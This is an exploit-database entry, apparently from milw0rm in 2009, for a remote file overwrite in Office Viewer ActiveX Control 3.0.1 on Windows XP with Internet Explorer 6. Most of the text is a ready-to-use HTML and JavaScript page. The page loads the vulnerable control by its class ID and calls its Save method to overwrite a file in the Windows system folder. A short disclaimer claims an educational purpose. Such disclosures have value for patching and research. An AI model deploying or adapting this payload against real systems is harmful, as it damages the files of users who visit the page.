Office Viewer ActiveX Control 3.0.1 (Save) Remote File Overwrite Exploit
| Javier Perez | 13.01.2009 | Verified | |
| Remote Exploits | Windows |
Exploit Code
=======================================================================================<br>
Author: Houssamix <br>
=======================================================================================<br>
Office Viewer ActiveX Control v 3.0.1 Remote File Overwrite exploit <br>
Tested on Windows XP Professional SP2 , with Internet Explorer 6 <br>
=======================================================================================<br>
<HTML>
<BODY>
<object id=hsmx classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F288F2}"></object>
<SCRIPT>
function Do_it()
{
File = "c:\\windows\\system_.ini"
hsmx.Save(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="execute exploit"><br>
</body>
</HTML>
=======================================================================================<br>
This was written for educational purpose. Use it at your own risk.<br>
Author will be not responsible for any damage.<br>
# milw0rm.com [2009-01-13]